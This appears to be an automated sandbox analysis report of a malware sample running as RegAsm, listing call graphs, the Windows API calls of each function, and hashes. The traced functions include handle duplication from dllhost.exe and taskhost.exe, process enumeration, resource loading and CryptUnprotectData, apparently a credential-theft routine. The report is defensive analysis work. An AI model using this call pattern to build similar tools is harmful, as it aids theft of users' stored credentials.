40051 439811 162 API calls 39882->40051 39883 43a9f6 160 API calls 39883->39884 39884->39866 39884->39870 39884->39883 40045 439bbb 22 API calls 39884->40045 39886 43acfd 39891 43ad2c 39886->39891 40052 438eed 16 API calls 39886->40052 39888 43ad19 40053 4233c5 16 API calls 39888->40053 39889 43ad58 40054 44081d 162 API calls 39889->40054 39891->39889 39895 43add9 39891->39895 39894 43ae3a memset 39896 43ae73 39894->39896 39895->39895 40058 423426 11 API calls 39895->40058 40059 42e1c0 146 API calls 39896->40059 39897 43adab 40056 438c4e 162 API calls 39897->40056 39900 43ad6c 39900->39866 39900->39897 40055 42370b memset memcpy memset 39900->40055 39902 43adcc 40057 440f84 12 API calls 39902->40057 39903 43ae96 40060 42e1c0 146 API calls 39903->40060 39906 43aea8 39912 43aec1 39906->39912 40061 42e199 146 API calls 39906->40061 39909 43af00 39909->39866 39913 43af1a 39909->39913 39914 43b3d9 39909->39914 39911 43b60f 39911->39866 40122 4393a5 17 API calls 39911->40122 39912->39909 40062 42e1c0 146 API calls 39912->40062 40063 438eed 16 API calls 39913->40063 39918 43b3f6 39914->39918 39923 43b4c8 39914->39923 39917 43af2f 40064 4233c5 16 API calls 39917->40064 40104 432878 12 API calls 39918->40104 39920 43af51 40065 423426 11 API calls 39920->40065 39922 43b4f2 40111 43a76c 21 API calls 39922->40111 39923->39922 40110 42bbd5 memcpy memcpy memcpy memset memcpy 39923->40110 39925 43af7d 40066 423426 11 API calls 39925->40066 39929 43b529 40112 44081d 162 API calls 39929->40112 39930 43b462 40106 423330 11 API calls 39930->40106 39931 43af94 40067 423330 11 API calls 39931->40067 39935 43afca 40068 423330 11 API calls 39935->40068 39936 43b47e 39940 43b497 39936->39940 40107 42374a memcpy memset memcpy memcpy memcpy 39936->40107 39937 43b544 39941 43b55c 39937->39941 40113 42c02e memset 39937->40113 39938 43b428 39938->39930 40105 432b60 16 API calls 39938->40105 40108 4233ae 11 API calls 39940->40108 40114 43a87a 162 API calls 39941->40114 39942 43afdb 40069 4233ae 11 API calls 39942->40069 39948 43b56c 39951 43b58a 39948->39951 40115 423330 11 API calls 39948->40115 39949 43b4b1 40109 423399 11 API calls 39949->40109 39950 43afee 40070 44081d 162 API calls 39950->40070 40116 440f84 12 API calls 39951->40116 39953 43b4c1 40118 42db80 162 API calls 39953->40118 39958 43b592 40117 43a82f 16 API calls 39958->40117 39961 43b5b4 40119 438c4e 162 API calls 39961->40119 39963 43b5cf 40120 42c02e memset 39963->40120 39965 43b005 39965->39866 39969 43b01f 39965->39969 40071 42d836 162 API calls 39965->40071 39966 43b1ef 40081 4233c5 16 API calls 39966->40081 39969->39966 40079 423330 11 API calls 39969->40079 40080 42d71d 162 API calls 39969->40080 39970 43b212 40082 423330 11 API calls 39970->40082 39971 43b087 40072 4233ae 11 API calls 39971->40072 39972 43add4 39972->39911 40121 438f86 16 API calls 39972->40121 39976 43b22a 40083 42ccb5 11 API calls 39976->40083 39979 43b23f 40084 4233ae 11 API calls 39979->40084 39980 43b10f 40075 423330 11 API calls 39980->40075 39982 43b257 40085 4233ae 11 API calls 39982->40085 39986 43b129 40076 4233ae 11 API calls 39986->40076 39987 43b26e 40086 4233ae 11 API calls 39987->40086 39990 43b09a 39990->39980 40073 42cc15 19 API calls 39990->40073 40074 4233ae 11 API calls 39990->40074 39991 43b282 40087 43a87a 162 API calls 39991->40087 39993 43b13c 40077 440f84 12 API calls 39993->40077 39995 43b29d 40088 423330 11 API calls 39995->40088 39998 43b15f 40078 4233ae 11 API calls 39998->40078 39999 43b2af 40001 43b2b8 39999->40001 40002 43b2ce 39999->40002 40089 4233ae 11 API calls 40001->40089 40090 440f84 12 API calls 40002->40090 40005 43b2c9 40092 4233ae 11 API calls 40005->40092 40006 43b2da 40091 42370b memset memcpy memset 40006->40091 40009 43b2f9 40093 423330 11 API calls 40009->40093 40011 43b30b 40094 423330 11 API calls 40011->40094 40013 43b325 40095 423399 11 API calls 40013->40095 40015 43b332 40096 4233ae 11 API calls 40015->40096 40017 43b354 40097 423399 11 API calls 40017->40097 40019 43b364 40098 43a82f 16 API calls 40019->40098 40021 43b370 40099 42db80 162 API calls 40021->40099 40023 43b380 40100 438c4e 162 API calls 40023->40100 40025 43b39e 40101 423399 11 API calls 40025->40101 40027 43b3ae 40102 43a76c 21 API calls 40027->40102 40029 43b3c3 40103 423399 11 API calls 40029->40103 40031->39852 40032->39856 40033->39855 40035 43a6f5 40034->40035 40036 43a765 40034->40036 40035->40036 40123 42a115 40035->40123 40036->39866 40043 4397fd memset 40036->40043 40040 43a73d 40040->40036 40041 42a115 146 API calls 40040->40041 40041->40036 40042->39861 40043->39869 40044->39866 40045->39884 40046->39873 40047->39878 40048->39874 40049->39877 40050->39882 40051->39886 40052->39888 40053->39891 40054->39900 40055->39897 40056->39902 40057->39972 40058->39894 40059->39903 40060->39906 40061->39912 40062->39912 40063->39917 40064->39920 40065->39925 40066->39931 40067->39935 40068->39942 40069->39950 40070->39965 40071->39971 40072->39990 40073->39990 40074->39990 40075->39986 40076->39993 40077->39998 40078->39969 40079->39969 40080->39969 40081->39970 40082->39976 40083->39979 40084->39982 40085->39987 40086->39991 40087->39995 40088->39999 40089->40005 40090->40006 40091->40005 40092->40009 40093->40011 40094->40013 40095->40015 40096->40017 40097->40019 40098->40021 40099->40023 40100->40025 40101->40027 40102->40029 40103->39972 40104->39938 40105->39930 40106->39936 40107->39940 40108->39949 40109->39953 40110->39922 40111->39929 40112->39937 40113->39941 40114->39948 40115->39951 40116->39958 40117->39953 40118->39961 40119->39963 40120->39972 40121->39911 40122->39866 40124 42a175 40123->40124 40126 42a122 40123->40126 40124->40036 40129 42b13b 146 API calls 40124->40129 40126->40124 40127 42a115 146 API calls 40126->40127 40130 43a174 40126->40130 40154 42a0a8 146 API calls 40126->40154 40127->40126 40129->40040 40142 43a196 40130->40142 40145 43a19e 40130->40145 40131 43a306 40131->40142 40168 4388c4 14 API calls 40131->40168 40134 42a115 146 API calls 40134->40145 40135 415a91 memset 40135->40145 40136 43a642 40136->40142 40173 4169a7 11 API calls 40136->40173 40141 43a635 40172 42c02e memset 40141->40172 40142->40126 40145->40131 40145->40134 40145->40135 40145->40142 40155 42ff8c 40145->40155 40163 4165ff 11 API calls 40145->40163 40164 439504 13 API calls 40145->40164 40165 4312d0 146 API calls 40145->40165 40166 42be4c memcpy memcpy memcpy memset memcpy 40145->40166 40167 43a121 11 API calls 40145->40167 40147 43a325 40147->40136 40147->40141 40147->40142 40148 4169a7 11 API calls 40147->40148 40149 42b5b5 memset memcpy 40147->40149 40150 42bf4c 14 API calls 40147->40150 40169 42b63e 14 API calls 40147->40169 40170 4165ff 11 API calls 40147->40170 40171 42bfcf memcpy 40147->40171 40148->40147 40149->40147 40150->40147 40154->40126 40174 43817e 40155->40174 40157 42ff99 40158 42ff9d 40157->40158 40159 42ffe3 40157->40159 40160 42ffd0 40157->40160 40158->40145 40179 4169a7 11 API calls 40159->40179 40178 4169a7 11 API calls 40160->40178 40163->40145 40164->40145 40165->40145 40166->40145 40167->40145 40168->40147 40169->40147 40170->40147 40171->40147 40172->40136 40173->40142 40175 438187 40174->40175 40176 438192 40174->40176 40180 4380f6 40175->40180 40176->40157 40178->40158 40179->40158 40182 43811f 40180->40182 40181 438164 40181->40176 40182->40181 40185 437e5e 40182->40185 40208 4300e8 memset memset memcpy 40182->40208 40209 437d3c 40185->40209 40187 437eb3 40187->40182 40188 437ea9 40188->40187 40192 437f22 40188->40192 40224 41f432 40188->40224 40191 437f06 40235 415c56 11 API calls 40191->40235 40195 437f7f 40192->40195 40196 432d4e 3 API calls 40192->40196 40194 437f95 40236 415c56 11 API calls 40194->40236 40195->40194 40198 43802b 40195->40198 40196->40195 40237 4165ff 11 API calls 40198->40237 40200 438054 40238 437371 137 API calls 40200->40238 40203 43806b 40204 438094 40203->40204 40239 42f50e 137 API calls 40203->40239 40206 437fa3 40204->40206 40240 4300e8 memset memset memcpy 40204->40240 40206->40187 40241 41f638 103 API calls 40206->40241 40208->40182 40210 437d69 40209->40210 40213 437d80 40209->40213 40242 437ccb 11 API calls 40210->40242 40212 437d76 40212->40188 40213->40212 40214 437d90 40213->40214 40216 437da3 40213->40216 40214->40212 40246 437ccb 11 API calls 40214->40246 40217 438460 133 API calls 40216->40217 40220 437dcb 40217->40220 40218 437de8 40245 424f26 122 API calls 40218->40245 40220->40218 40243 444283 13 API calls 40220->40243 40222 437dfc 40244 437ccb 11 API calls 40222->40244 40225 41f54d 40224->40225 40231 41f44f 40224->40231 40226 41f466 40225->40226 40276 41c635 memset memset 40225->40276 40226->40191 40226->40192 40231->40226 40233 41f50b 40231->40233 40247 41f1a5 40231->40247 40272 41c06f memcmp 40231->40272 40273 41f3b1 89 API calls 40231->40273 40274 41f398 85 API calls 40231->40274 40233->40225 40233->40226 40275 41c295 85 API calls 40233->40275 40235->40187 40236->40206 40237->40200 40238->40203 40239->40204 40240->40206 40241->40187 40242->40212 40243->40222 40244->40218 40245->40212 40246->40212 40248 41bc3b 100 API calls 40247->40248 40249 41f1b4 40248->40249 40250 41edad 85 API calls 40249->40250 40257 41f282 40249->40257 40251 41f1cb 40250->40251 40252 41f1f5 memcmp 40251->40252 40253 41f20e 40251->40253 40251->40257 40252->40253 40254 41f21b memcmp 40253->40254 40253->40257 40255 41f326 40254->40255 40258 41f23d 40254->40258 40256 41ee6b 85 API calls 40255->40256 40255->40257 40256->40257 40257->40231 40258->40255 40259 41f28e memcmp 40258->40259 40261 41c8df 55 API calls 40258->40261 40259->40255 40260 41f2a9 40259->40260 40260->40255 40263 41f308 40260->40263 40264 41f2d8 40260->40264 40262 41f269 40261->40262 40262->40255 40266 41f287 40262->40266 40267 41f27a 40262->40267 40263->40255 40270 4446ce 11 API calls 40263->40270 40265 41ee6b 85 API calls 40264->40265 40268 41f2e0 40265->40268 40266->40259 40269 41ee6b 85 API calls 40267->40269 40271 41b1ca memset 40268->40271 40269->40257 40270->40255 40271->40257 40272->40231 40273->40231 40274->40231 40275->40225 40276->40226 40277 41493c EnumResourceNamesW 40278 44660a 40281 4465e4 40278->40281 40280 446613 40282 4465f3 __dllonexit 40281->40282 40283 4465ed _onexit 40281->40283 40282->40280 40283->40282

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                • API String ID: 2018390131-3398334509
                                                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 520 413e79-413eae call 413959 call 413ca4 CloseHandle 512->520 521 413e28-413e35 512->521 515 413ec8-413eda call 4099f4 513->515 516 413ebf-413ec6 free 513->516 518 413edb-413ee2 515->518 516->518 522 413ee4 518->522 523 413ee7-413efe 518->523 520->511 526 413e61-413e68 521->526 527 413e37-413e44 GetModuleHandleW 521->527 522->523 523->508 526->520 529 413e6a-413e77 QueryFullProcessImageNameW 526->529 527->526 528 413e46-413e5c 527->528 528->526 529->520
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                • API String ID: 3957639419-1740548384
                                                                                                                                                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                • String ID: BIN
                                                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1945712969-0
                                                                                                                                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
